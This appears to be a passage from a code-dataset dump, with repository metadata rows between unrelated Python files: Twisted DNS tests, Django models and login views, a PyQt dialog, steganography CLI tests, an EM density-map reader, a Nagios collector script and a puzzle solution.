return defer.fail(socket.gaierror("Couldn't connect"))
resolver = Resolver(servers=[('0.0.0.0', 0)])
resolver._query = query
messages = []
# Let's patch dns.DNSDatagramProtocol.query, as there is no easy way to
# customize it.
self.patch(dns.DNSDatagramProtocol, "query", queryProtocol)
records = [
dns.RRHeader(name='fooba.com', type=dns.NS, cls=dns.IN, ttl=700,
auth=False,
payload=dns.Record_NS(name='ns.twistedmatrix.com',
ttl=700))]
m = dns.Message(id=999, answer=1, opCode=0, recDes=0, recAv=1, auth=1,
rCode=0, trunc=0, maxSize=0)
m.answers = records
messages.append(m)
return self.assertFailure(
resolver.getHostByName("fooby.com"), socket.gaierror)
class SecondaryAuthorityServiceTests(unittest.TestCase):
"""
Tests for L{SecondaryAuthorityService}, a service which keeps one or more
authorities up to date by doing zone transfers from a master.
"""
def test_constructAuthorityFromHost(self):
"""
L{SecondaryAuthorityService} can be constructed with a C{str} giving a
master server address and several domains, causing the creation of a
secondary authority for each domain and that master server address and
the default DNS port.
"""
primary = '192.168.1.2'
service = SecondaryAuthorityService(
primary, ['example.com', 'example.org'])
self.assertEqual(service.primary, primary)
self.assertEqual(service._port, 53)
self.assertEqual(service.domains[0].primary, primary)
self.assertEqual(service.domains[0]._port, 53)
self.assertEqual(service.domains[0].domain, 'example.com')
self.assertEqual(service.domains[1].primary, primary)
self.assertEqual(service.domains[1]._port, 53)
self.assertEqual(service.domains[1].domain, 'example.org')
def test_constructAuthorityFromHostAndPort(self):
"""
L{SecondaryAuthorityService.fromServerAddressAndDomains} constructs a
new L{SecondaryAuthorityService} from a C{str} giving a master server
address and DNS port and several domains, causing the creation of a secondary
authority for each domain and that master server address and the given
DNS port.
"""
primary = '192.168.1.3'
port = 5335
service = SecondaryAuthorityService.fromServerAddressAndDomains(
(primary, port), ['example.net', 'example.edu'])
self.assertEqual(service.primary, primary)
self.assertEqual(service._port, 5335)
self.assertEqual(service.domains[0].primary, primary)
self.assertEqual(service.domains[0]._port, port)
self.assertEqual(service.domains[0].domain, 'example.net')
self.assertEqual(service.domains[1].primary, primary)
self.assertEqual(service.domains[1]._port, port)
self.assertEqual(service.domains[1].domain, 'example.edu')
class SecondaryAuthorityTests(unittest.TestCase):
"""
L{twisted.names.secondary.SecondaryAuthority} correctly constructs objects
with a specified IP address and optionally specified DNS port.
"""
def test_defaultPort(self):
"""
When constructed using L{SecondaryAuthority.__init__}, the default port
of 53 is used.
"""
secondary = SecondaryAuthority('192.168.1.1', 'inside.com')
self.assertEqual(secondary.primary, '192.168.1.1')
self.assertEqual(secondary._port, 53)
self.assertEqual(secondary.domain, 'inside.com')
def test_explicitPort(self):
"""
When constructed using L{SecondaryAuthority.fromServerAddressAndDomain},
the specified port is used.
"""
secondary = SecondaryAuthority.fromServerAddressAndDomain(
('192.168.1.1', 5353), 'inside.com')
self.assertEqual(secondary.primary, '192.168.1.1')
self.assertEqual(secondary._port, 5353)
self.assertEqual(secondary.domain, 'inside.com')
def test_transfer(self):
"""
An attempt is made to transfer the zone for the domain the
L{SecondaryAuthority} was constructed with from the server address it
was constructed with when L{SecondaryAuthority.transfer} is called.
"""
secondary = SecondaryAuthority.fromServerAddressAndDomain(
('192.168.1.2', 1234), 'example.com')
secondary._reactor = reactor = MemoryReactorClock()
secondary.transfer()
# Verify a connection attempt to the server address above
host, port, factory, timeout, bindAddress = reactor.tcpClients.pop(0)
self.assertEqual(host, '192.168.1.2')
self.assertEqual(port, 1234)
# See if a zone transfer query is issued.
proto = factory.buildProtocol((host, port))
transport = StringTransport()
proto.makeConnection(transport)
msg = Message()
# DNSProtocol.writeMessage length encodes the message by prepending a
# 2 byte message length to the buffered value.
msg.decode(StringIO(transport.value()[2:]))
self.assertEqual(
[dns.Query('example.com', dns.AXFR, dns.IN)], msg.queries)
| [
"l”ibaojunqd@foxmail.com“"
] | l”ibaojunqd@foxmail.com“ |
a049f488ea3a7be28b9825bef61e359ef3aa547c | d2aa33baeabc1bfb92cef62e22422fe36c75e42f | /order/api/postPayment/requestDelivery.py | 6ecaec644edc8f440604fbd4930f63e00b4950cc | [] | no_license | twkiiim/jawsdays2020-demo-serverless-order-service | 6a1e1189ff2b6402bb390f28a5362d65f34f108c | fdaf55c5e80e64d9de92b5c8bb8dc7ad4ae36916 | refs/heads/master | 2023-02-08T10:21:44.675790 | 2020-03-27T11:19:18 | 2020-03-27T11:19:18 | 250,514,918 | 9 | 3 | null | 2023-01-24T01:44:03 | 2020-03-27T11:18:13 | TypeScript | UTF-8 | Python | false | false | 225 | py | import random
def handler(event, context):
randVal = random.random()
if randVal > 0.01:
return 'delivery successfully requested!'
else:
raise Exception('delivery request (randomly) failed')
| [
"twkiiim@gmail.com"
] | twkiiim@gmail.com |
d1f1d103d079eb17e04d8229327ff103e8fb3764 | 3c65c697ddfade65a74bdb4ae27bd41a7ce171d2 | /paymentapp/migrations/0010_emp_basic_update_emp_leaves_emp_pal_slip.py | 423da004ca774cc2cb03a8ddeacc504d686d0dc9 | [] | no_license | pedhababu/-Online-Payroll-System | cc1d776d93afc31c7ddd41937d67df4d41f57c5d | 9c20c91abd69971ca5e557ded574c8dfad7db42f | refs/heads/main | 2023-01-30T06:30:49.913482 | 2020-12-14T05:05:44 | 2020-12-14T05:05:44 | 318,046,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,693 | py | # Generated by Django 2.0.7 on 2018-12-24 11:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('paymentapp', '0009_finance_login'),
]
operations = [
migrations.CreateModel(
name='Emp_basic_update',
fields=[
('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('basicpay', models.DecimalField(decimal_places=2, max_digits=10)),
],
),
migrations.CreateModel(
name='Emp_Leaves',
fields=[
('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('total_no_of_work_days', models.IntegerField(verbose_name=2)),
('paid_leaves', models.IntegerField(verbose_name=2)),
('non_paid_leaves', models.IntegerField(verbose_name=2)),
],
),
migrations.CreateModel(
name='Emp_pal_slip',
fields=[
('empid', models.CharField(max_length=8, primary_key=True, serialize=False)),
('empname', models.CharField(max_length=20)),
('basicpay', models.DecimalField(decimal_places=2, max_digits=8)),
('da', models.DecimalField(decimal_places=2, max_digits=8)),
('hra', models.DecimalField(decimal_places=2, max_digits=8)),
('pf', models.DecimalField(decimal_places=2, max_digits=8)),
('tax', models.DecimalField(decimal_places=2, max_digits=8)),
('tsal', models.DecimalField(decimal_places=2, max_digits=8)),
],
),
]
| [
"noreply@github.com"
] | pedhababu.noreply@github.com |
18c67769277ca4102051cfe3429e947e57a1803c | 3b1cc8ccc886599f89feaa42f2929f7ba2fbe3d1 | /virtual/lib/python3.7/site-packages/star_ratings/forms.py | 8cbd3945fadfa6a40eb0c668e5a5717f28772149 | [
"MIT"
] | permissive | AliKheirAbdi/reviewer | bb5a869bb34037f69fa16c6a73d29fc50ce84710 | 597c06e90c3eeb688b77570ced5bc45be08990de | refs/heads/master | 2022-12-03T10:25:32.353688 | 2019-11-25T07:11:31 | 2019-11-25T07:11:31 | 223,419,144 | 1 | 0 | MIT | 2022-11-22T04:50:53 | 2019-11-22T14:21:26 | Python | UTF-8 | Python | false | false | 740 | py | from __future__ import absolute_import
from django import forms
from . import get_star_ratings_rating_model
from .models import UserRating
class CreateUserRatingForm(forms.ModelForm):
class Meta:
model = UserRating
exclude = [
'count',
'total',
'average',
'rating',
]
def __init__(self, obj=None, *args, **kwargs):
self.obj = obj
super(CreateUserRatingForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
return get_star_ratings_rating_model().objects.rate(
self.obj,
self.cleaned_data['score'],
user=self.cleaned_data['user'],
ip=self.cleaned_data['ip']
)
| [
"akheirali@gmail.com"
] | akheirali@gmail.com |
4df750f693ba3b892ace048b47893d684502e9c0 | 184f952a4c65575f27140b828c92204538716991 | /component/phaseCorrectionParamDialog.py | e63dcc5ae44eb4e179fdb4f7b93ec1860474621c | [] | no_license | liuchengyiu/calib | fb707f61830d9e4992920bb8d15502a03b5bea4c | 0e842b07a0ef7f1a88da2ad5cffd303448099695 | refs/heads/master | 2023-04-09T05:01:20.044748 | 2021-04-15T09:11:19 | 2021-04-15T09:11:19 | 299,260,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | from calib.window import Ui_phaseCorrectionParamDialog
from PyQt5 import QtWidgets
class My_phaseCorrectionParamDialog(QtWidgets.QDialog, Ui_phaseCorrectionParamDialog):
def __init__(self):
super(My_phaseCorrectionParamDialog, self).__init__()
self.setupUi(self)
self.okPushButton.clicked.connect(self.close)
self.cancelPushButton.clicked.connect(self.close)
def getValue(self) -> dict:
mask = self.weightMaskSpinBox.value()
phase_a = [
self.phaseAVoltageDoubleSpinBox.value(),
self.phaseACurrentDoubleSpinBox.value(),
self.phaseAPowerFactorDoubleSpinBox.value()
]
phase_b = [
self.phaseBVoltageDoubleSpinBox.value(),
self.phaseBCurrentDoubleSpinBox.value(),
self.phaseBPowerFactorDoubleSpinBox.value()
]
phase_c = [
self.phaseCVoltageDoubleSpinBox.value(),
self.phaseCCurrentDoubleSpinBox.value(),
self.phaseCPowerFactorDoubleSpinBox.value()
]
return {'mask': mask, 'phase_a': phase_a, 'phase_b': phase_b, 'phase_c': phase_c}
| [
"1962487785@qq.com"
] | 1962487785@qq.com |
7bd37547473132d5a8e03c350d12986516583aaf | 1d951c28538375c9d1f6b88583b4dc86f2fb2a32 | /apps/login_and_registration_app/views.py | 57be555073576d67b6f8a9b9be48a50c9125e2c3 | [] | no_license | rpandy/travels | 654b7ad91fe97d7213f0187e63e277f8a5648bb9 | dc038a9c038fb7b08782df60323936f6f13ef94b | refs/heads/master | 2021-01-20T10:10:11.590181 | 2017-05-05T02:26:18 | 2017-05-05T02:26:18 | 90,329,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.contrib import messages
from .models import User
import bcrypt
# Create your views here.
def index(request):
print "Index route"
print "***********"
context = {
'users': User.objects.all()
}
return render(request, 'login_and_registration_app/index.html',context)
def register(request):
print "Register route"
print "***********"
if request.method == 'POST':
print "request.POST:", request.POST
#use valid and data to unpack 2 values from tuple
valid, data = User.objects.validate_and_create(request.POST)
if valid == True:
print "Successful registration!"
print "***********"
else:
for err in data:
messages.error(request,err)
return redirect('auth:index')
#save info in session for success page.
user_info = User.objects.validate_and_login(request.POST)
request.session['name'] = user_info[1].name
request.session['user_id'] = user_info[1].id
return redirect('travel:index')
def login(request):
print "Login route"
print "***********"
if request.method == 'POST':
print "request.POST:", request.POST
print "***********"
valid, data = User.objects.validate_and_login(request.POST)
if valid == True:
print "Successful Login"
print "***********"
else:
for err in data:
messages.error(request,err)
return redirect('auth:index')
#save info in session for success page.
user_info = User.objects.validate_and_login(request.POST)
request.session['name'] = user_info[1].name
request.session['user_id'] = user_info[1].id
# print request.user.id
print "name in session:", request.session['name']
print "id in session:",request.session['user_id']
user_id = request.session['user_id']
print "THIS IS THE USER ID-------->", user_id
# print "THIS IS THE NEW SESSION", request.session['user_id']
return redirect('travel:index')
def logout(request):
print "logout route"
print "***********"
request.session.clear()
return redirect('auth:index')
| [
"rspandy@gmail.com"
] | rspandy@gmail.com |
19f2c55be8583bb6f350ef4ab6ebd12fdfa1667a | f4689f3b1325403d4271abf566b67ba8cc00a154 | /Stegan/stegan/scripts/test/test_stegan.py | 280eff4a0889f03aedaa4cda58b016842f513f4b | [] | no_license | roneill/CS4500 | 3d12f73c6fdf76a6694e78a7a428c1dd33cfa9b3 | 5674488075dfc2a0917e2e96e93317423a26647a | refs/heads/master | 2020-04-05T23:35:40.383788 | 2012-04-18T01:29:45 | 2012-04-18T01:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | import sys, os
import unittest
sys.path.insert(0, os.path.abspath(os.getcwd()))
from stegan.scripts import main
class TestStegan(unittest.TestCase):
def setUp(self):
del(sys.argv[1:])
def tearDown(self):
pass
def test_parseArgs_whenNoArguments_raiseException(self):
self.assertRaises(Exception, main.parse_args)
def test_parseArgs_whenFirstArgNotEncodeOrDecode_raiseException(self):
sys.argv.append('--unknown')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--unknown')
def test_parseArgs_whenEncodeWithTooFewArgs_raiseException(self):
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
def test_parseArgs_whenEncodeWithTooManyArgs_raiseException(self):
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
sys.argv.append('arg4')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
sys.argv.remove('arg4')
def test_parseArgs_whenEncodeWithCorrectParams_returnsDict(self):
expectedArgs = {
'action': 'encode',
'container': 'arg1',
'payload': 'arg2',
'trojan': 'arg3'}
sys.argv.append('--encode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
self.assertEqual(expectedArgs, main.parse_args())
sys.argv.remove('--encode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
def test_parseArgs_whenDecodeWithTooFewArgs_raiseException(self):
sys.argv.append('--decode')
sys.argv.append('arg1')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--decode')
sys.argv.remove('arg1')
def test_parseArgs_whenDecodeWithTooManyArgs_raiseException(self):
sys.argv.append('--decode')
sys.argv.append('arg1')
sys.argv.append('arg2')
sys.argv.append('arg3')
self.assertRaises(Exception, main.parse_args)
sys.argv.remove('--decode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
sys.argv.remove('arg3')
def test_parseArgs_whenDecodeWithCorrectParams_returnsDict(self):
expectedArgs = {
'action': 'decode',
'trojan': 'arg1',
'payload': 'arg2'}
sys.argv.append('--decode')
sys.argv.append('arg1')
sys.argv.append('arg2')
self.assertEqual(expectedArgs, main.parse_args())
sys.argv.remove('--decode')
sys.argv.remove('arg1')
sys.argv.remove('arg2')
if __name__ == "__main__":
unittest.main()
| [
"mrrc00@gmail.com"
] | mrrc00@gmail.com |
546e7f10c889b164d97a7716d6ad0a4d47711bdf | aa1d9d60de89f92351cf37d9e1f4df04cd9b0449 | /_exercise/_basics/_algorithm/dynamic/fibonacci.py | 38366a79f922568e2c6f9f129168af673ee39b51 | [] | no_license | zhoufengzd/python | 7ca0de97fa0050f4984d866c87ea0f3069ad3cfa | 036e2e17fde91c5ef46b22af00fc73e41bf75428 | refs/heads/master | 2022-10-13T23:10:10.538705 | 2022-09-25T03:51:26 | 2022-09-25T03:51:26 | 209,899,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | def fibonacci(n: int):
f = {0: 0, 1: 1}
for i in range(2, n + 1):
f[i] = f[i - 1] + f[i - 2]
return f[n]
def fibonacci3(n: int):
"sum of three previous numbers"
f = {0: 1, 1: 1, 2: 1}
for i in range(3, n + 1):
f[i] = f[i - 1] + f[i - 2] + f[i - 3]
return f[n]
if __name__ == "__main__":
# for n in [1, 2, 5, 50, 100]:
# print("{} => {}".format(n, fibonacci(n)))
for n in range(0, 10):
print("{} => {}".format(n, fibonacci3(n)))
| [
"zhoufengzd@gmail.com"
] | zhoufengzd@gmail.com |
3cc745f34716dfeb254720f8c0c01a80b7c5d438 | 67ca269e39935d0c439329c3a63df859e40168bb | /autoPyTorch/pipeline/components/setup/lr_scheduler/constants.py | 2e5895632deb9caa92b26070d7495d27d57ba970 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-philippe-de-muyter"
] | permissive | automl/Auto-PyTorch | 2e67ffb44f40d9993470ded9b63f10a5164b41df | 56a2ac1d69c7c61a847c678879a67f5d3672b3e8 | refs/heads/master | 2023-07-14T22:55:57.826602 | 2022-08-23T16:43:15 | 2022-08-23T16:43:15 | 159,791,040 | 2,214 | 280 | Apache-2.0 | 2023-04-04T14:41:15 | 2018-11-30T08:18:34 | Python | UTF-8 | Python | false | false | 450 | py | from enum import Enum
class StepIntervalUnit(Enum):
"""
By which interval we perform the step for learning rate schedulers.
Attributes:
batch (str): We update every batch evaluation
epoch (str): We update every epoch
valid (str): We update every validation
"""
batch = 'batch'
epoch = 'epoch'
valid = 'valid'
StepIntervalUnitChoices = [step_interval.name for step_interval in StepIntervalUnit]
| [
"noreply@github.com"
] | automl.noreply@github.com |
744ef4550ea1381e96181d3d0cf7df33ca8a133d | 762de1c66746267e05d53184d7854934616416ee | /tools/MolSurfGenService/MolSurfaceGen32/chimera/share/VolumeData/tom_em/em_format.py | 6c027e9831ce8864e76310e1e1193380a04ead29 | [] | no_license | project-renard-survey/semanticscience | 6e74f5d475cf0ebcd9bb7be6bb9522cf15ed8677 | 024890dba56c3e82ea2cf8c773965117f8cda339 | refs/heads/master | 2021-07-07T21:47:17.767414 | 2017-10-04T12:13:50 | 2017-10-04T12:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,434 | py | # -----------------------------------------------------------------------------
# Read TOM Toolbox EM density map file (http://www.biochem.mpg.de/tom/)
# electron microscope data.
#
# Byte swapping will be done if needed.
#
# -----------------------------------------------------------------------------
#
class EM_Data:
def __init__(self, path):
self.path = path
import os.path
self.name = os.path.basename(path)
file = open(path, 'rb')
file.seek(0,2) # go to end of file
file_size = file.tell()
file.seek(0,0) # go to beginning of file
# Determine byte order from machine code
# OS-9 0
# VAX 1
# Convex 2
# SGI 3
# Sun 4 (not supported)
# Mac 5
# PC 6
self.swap_bytes = False
from numpy import int8, little_endian
machine_code = self.read_values(file, int8, 1)
file_little_endian = machine_code in (1, 6)
self.swap_bytes = ((file_little_endian and not little_endian) or
(not file_little_endian and little_endian))
file.seek(0,0)
v = self.read_header_values(file)
self.check_header_values(v, file_size)
self.data_offset = file.tell()
file.close()
self.data_size = (v['xsize'], v['ysize'], v['zsize'])
dstep = v['pixelsize']
if dstep == 0:
dstep = 1.0
self.data_step = (dstep, dstep, dstep)
self.data_origin = (0., 0., 0.)
# ---------------------------------------------------------------------------
# Format derived from C header file mrc.h.
#
def read_header_values(self, file):
from numpy import int8, int32
i8 = int8
i32 = int32
v = {}
v['machine code']= self.read_values(file, i8, 1)
v['os 9 version']= self.read_values(file, i8, 1)
v['abandoned header']= self.read_values(file, i8, 1)
v['data type code']= self.read_values(file, i8, 1)
v['xsize'], v['ysize'], v['zsize'] = self.read_values(file, i32, 3)
v['comment'] = file.read(80)
v['user param'] = self.read_values(file, i32, 40)
v['pixelsize'] = v['user param'][6] / 1000.0 # nm
v['user data'] = file.read(256)
return v
# ---------------------------------------------------------------------------
#
def check_header_values(self, v, file_size):
mc = v['machine code']
if mc < 0 or mc > 6:
raise SyntaxError, ('Bad EM machine code %d at byte 0, must be 0 - 6.'
% mc)
dc = v['data type code']
if not dc in (1,2,4,5,8,9):
raise SyntaxError, ('Bad EM data type code %d' % dc +
', must be 1, 2, 4, 5, 8, or 9')
from numpy import uint8, int16, int32, float32, float64
types = { 1: uint8,
2: int16,
4: int32,
5: float32,
9: float64 }
if types.has_key(dc):
self.element_type = types[dc]
else:
raise SyntaxError, 'Complex EM data value type not supported'
if float(v['xsize']) * float(v['ysize']) * float(v['zsize']) > file_size:
raise SyntaxError, ('File size %d too small for grid size (%d,%d,%d)'
% (file_size, v['xsize'],v['ysize'],v['zsize']))
# ---------------------------------------------------------------------------
#
def read_values(self, file, etype, count):
from numpy import array
esize = array((), etype).itemsize
string = file.read(esize * count)
values = self.read_values_from_string(string, etype, count)
return values
# ---------------------------------------------------------------------------
#
def read_values_from_string(self, string, etype, count):
from numpy import fromstring
values = fromstring(string, etype)
if self.swap_bytes:
values = values.byteswap()
if count == 1:
return values[0]
return values
# ---------------------------------------------------------------------------
# Returns 3D NumPy matrix with zyx index order.
#
def read_matrix(self, ijk_origin, ijk_size, ijk_step, progress):
from VolumeData.readarray import read_array
matrix = read_array(self.path, self.data_offset,
ijk_origin, ijk_size, ijk_step,
self.data_size, self.element_type, self.swap_bytes,
progress)
return matrix
| [
"alex.gawronski@d60594c4-dda9-11dd-87d8-31aa04531ed5"
] | alex.gawronski@d60594c4-dda9-11dd-87d8-31aa04531ed5 |
de03cdcacdea8bd7119753b7c842dea1c168ba07 | df2a8f791b8c4091add7fd18e32ad44a977310c6 | /2 Regression/Random_Forest_Regression/random_forest_regression1.py | 35994bd4062b9499323d23db48ed9f48f40386d0 | [] | no_license | raviagrawal121/machine_learning_for_datascienec | 3508b1c3394eeb35f20145fa46533965479e684a | 3afffc04efce9572433330edecf96580b819db21 | refs/heads/master | 2023-05-24T19:00:42.028399 | 2019-06-20T09:27:32 | 2019-06-20T09:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,410 | py | # Random Forest Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2].values
# Splitting the dataset into the Training set and Test set
"""from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)"""
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting the Random Forest Regression Model to the dataset
from sklearn.ensemble import RandomForestRegressor
regressor = RandomForestRegressor(n_estimators = 300,random_state = 0)
regressor.fit(X,y)
# Predicting a new result
y_pred = regressor.predict(np.array([[6.5]]))
# Visualising the RRandom Forest Regression results (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Random Forest Regression Model)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show() | [
"noreply@github.com"
] | raviagrawal121.noreply@github.com |
b4486e22f0b890e149030edb2bdfd81b24a0c565 | c338114a630553f457f9f6a121919cb214776651 | /core/migrations/0006_expense.py | 2b24b6d0bff17a4546ba017e374eba2ae4856ee8 | [] | no_license | ino-shan/catwellbeing | e5dbc46aef21219d9d7d9796cb71f592f249a203 | 7dc3146233c6dcce709ecbbe328e48678dda0510 | refs/heads/master | 2022-07-04T12:39:09.282894 | 2020-05-11T04:27:11 | 2020-05-11T04:27:11 | 262,936,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | # Generated by Django 2.2.5 on 2020-03-27 16:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0005_auto_20200327_1245'),
]
operations = [
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1024)),
('cost', models.FloatField()),
('expense_date', models.DateField()),
('cat', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Cat')),
('expender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"inoshanilangeswaran@hotmail.co.uk"
] | inoshanilangeswaran@hotmail.co.uk |
778ae380f0cad62eb41f8e8dbe2862993143ee93 | 495907c7e2e2d591df2d6906335c3d89c5a4a47b | /helpers/logHelpers.py | 42129a0969e389b0136e85078c31651d76b26bbb | [] | no_license | ePandda/idigpaleo-ingest | 319194125aded01f018cfb7c1fe7044fe8c66770 | 8473ab31e7a56878236136d0ace285ab3738f208 | refs/heads/master | 2020-11-26T19:48:13.959972 | 2018-04-21T17:19:38 | 2018-04-21T17:19:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | #
# Class for logining status/errors from the ingest
#
# Uses the main pythn logging module
import logging
import time
def createLog(module, level):
logger = logging.getLogger(module)
if level:
checkLevel = level.lower()
else:
checkLevel = 'warning'
levels = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'critical': logging.CRITICAL}
today = time.strftime("%Y_%m_%d")
loggerFile = './logs/'+today+"_ingest.log"
fileLog = logging.FileHandler(loggerFile)
conLog = logging.StreamHandler()
if checkLevel in levels:
logger.setLevel(levels[checkLevel])
fileLog.setLevel(levels[checkLevel])
conLog.setLevel(levels[checkLevel])
else:
fileLog.setLevel(levels['warning'])
conLog.setLevel(levels['warning'])
formatter = logging.Formatter('%(asctime)s_%(name)s_%(levelname)s: %(message)s')
fileLog.setFormatter(formatter)
conLog.setFormatter(formatter)
logger.addHandler(fileLog)
logger.addHandler(conLog)
return logger
| [
"mwbenowitz@gmail.com"
] | mwbenowitz@gmail.com |
5b7de37d3e3ae6122a53cb151f264294e1e07cfd | 4ec57b6ca1125feb546487ebf736fb1f7f3531ce | /src/bin/huawei_server/collect.py | 7e38908b1087dbed5c09a721f9b18ad0fac206cd | [
"MIT"
] | permissive | Huawei/Server_Management_Plugin_Nagios | df595b350ef1cf63347725e443b518c521afde5a | fbfbb852a90b6e1283288111eadbd49af2e79343 | refs/heads/master | 2022-09-14T15:59:48.438453 | 2022-08-22T03:19:20 | 2022-08-22T03:19:20 | 120,845,298 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,370 | py | #encoding:utf-8
import sys
import os
import traceback
from config import VERSTION_STR
from base.logger import Logger
from model.plugin import LoggerConfig
from service.collectservice import CollectService
from util.common import Common
from util.check import Check
from constant.constant import *
from threading import Timer
import time
def loggerConfig(node, loggerData):
elements = Common.getChild(node);
if elements is None:
return False;
for element in elements:
if "param" != element.tag:
return False;
if "level" == element.attrib.get("name"):
loggerData.setLoggerLevel(element.text);
elif "size" == element.attrib.get("name"):
loggerData.setLoggerSize(element.text);
elif "index" == element.attrib.get("name"):
loggerData.setLoggerIndex(element.text);
loggerData.setLoggerPath(Common.getExePath() + os.path.sep + "log");
return True;
def pluginConfig(loggerData):
if not os.path.exists(Common.getPluginConfigPath()):
return False;
root = Common.getRoot(Common.getPluginConfigPath());
if root is None:
return False;
for node in Common.getChild(root):
if "config" != node.tag:
return False;
if "log" == node.attrib.get('name'):
loggerConfig(node, loggerData);
return True;
def initPlugin():
#parse plugin config
loggerData = LoggerConfig();
if not pluginConfig(loggerData):
return False;
logger = Logger.getInstance().init(loggerData);
return True;
def main(argv=None):
if not initPlugin():
return -1;
Logger.getInstance().error('========= %s ======='%VERSTION_STR)
if(len(argv) < 2):
Logger.getInstance().error("main error: param length should not be zero.");
return -1;
try:
if "-p" == argv[1]:
if not Check.checkPluginModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1:]);
return -1;
service = CollectService(COLLECT_MODE_CMD_PLUGIN, None);
elif "-a" == argv[1]:
if not Check.checkTotalModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1] );
return -1;
service = CollectService(COLLECT_MODE_CMD_TOTAL, argv[2:]);
elif "-f" == argv[1]:
if not Check.checkFileModeParam(argv[2:]):
Logger.getInstance().error("main error: param is invalid, param=%s." % sys.argv[1] );
return -1;
service = CollectService(COLLECT_MODE_CMD_FILE, argv[2:]);
else:
Logger.getInstance().error("main error: option param is invalid optoion : [%s]" % (argv[1]));
return -1
return service.start();
except Exception, e:
Logger.getInstance().exception("main exception: collect device info exception: [%s]" % e);
return -1
if __name__ == "__main__":
timeInteval = 300
while True:
t = Timer(timeInteval ,sys.exit(main(sys.argv)) )
t.start()
time.sleep(300)
| [
"31431891+serverplugin@users.noreply.github.com"
] | 31431891+serverplugin@users.noreply.github.com |
3f85bc19f49701b121a391821a49fa058ebe6c03 | ea5bbdc22cc929ae67f85ab674013ad7c1dcbe20 | /baekjoon/13460.py | 616f1ddf99b42c8110df0c4e23ba2c5f7f15b3f2 | [] | no_license | ssMinji/Algorithms | d1fbd3089c8df43cd80b89f7f345cc28ac18d40c | 1ab8aaec1801059836e47cc868b715bfcdfc5072 | refs/heads/master | 2021-10-27T22:29:26.484647 | 2021-10-20T08:00:19 | 2021-10-20T08:00:19 | 228,370,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,820 | py | dx = [0, 0, 1, -1]
dy = [1, -1, 0, 0]
LIMIT = 10
class Result:
def __init__(self, moved, hole, x, y):
self.moved = moved
self.hole = hole
self.x = x
self.y = y
def gen(k):
a = [0]*LIMIT
for i in range(LIMIT):
a[i] = (k&3)
k >>= 2
return a
def simulate(a, k, x, y): # 지도, 방향, 좌표
n = len(a)
m = len(a[0])
if a[x][y] == '.': # 이미 구멍에 빠졌다는 것
return Result(False, False, x, y) # moved, hole, x, y
moved = False
while True:
nx, ny = x + dx[k], y+dy[k]
ch = a[nx][ny]
if ch == '#':
return Result(moved, False, x, y)
elif ch in 'RB':
return Result(moved, False, x, y)
elif ch == '.':
a[x][y], a[nx][ny] = a[nx][ny], a[x][y]
x, y = nx, ny
moved = True
elif ch == 'O':
a[x][y] = '.'
moved = True
return Result(moved, True, x, y)
def check(a, dirs):
n = len(a)
m = len(a[0])
hx, hy = 0, 0 # 구멍위치
rx, ry = 0, 0 # 빨간 공 위치
bx, by = 0, 0 # 파란 공 위치
for i in range(n):
for j in range(m):
if a[i][j] == 'O':
hx, hy = i, j
elif a[i][j] == 'R':
